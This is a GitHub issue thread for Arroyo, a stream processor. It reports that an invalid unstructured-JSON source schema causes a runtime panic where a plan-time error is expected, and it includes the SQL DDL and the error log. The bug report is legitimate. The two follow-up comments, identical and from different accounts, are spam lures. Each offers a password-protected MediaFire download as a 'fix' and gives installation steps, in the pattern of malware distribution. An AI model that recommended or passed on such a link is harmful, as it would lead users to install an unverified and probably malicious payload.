### ISSUE TITLE
Invalid unstructured json schema in source is not detected at plan time

### ISSUE THREAD

**Issue by mwylde** [ArroyoSystems/arroyo#729]
This query DDL is invalid because it specifies an unstructured JSON schema, but it does not have a single column of type TEXT/JSON:

```sql
CREATE TABLE source (
  x INT
) WITH (
    connector = 'websocket',
    endpoint = 'wss://ws-feed.exchange.coinbase.com',
    subscription_message = '{
      "type": "subscribe",
      "product_ids": [
        "BTC-USD"
      ],
      "channels": ["ticker"]
    }',
    format = 'json',
    'json.unstructured' = 'true'
);
```

This should produce a plan-time failure, but it does not. Instead it produces a runtime failure:

```
2024-08-30T18:08:30.232087Z ERROR arroyo_server_common: panicked at crates/arroyo-formats/src/de.rs:319:14:
no 'value' column for RawString format panic.file="crates/arroyo-formats/src/de.rs" panic.line=319 panic.column=14
```

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
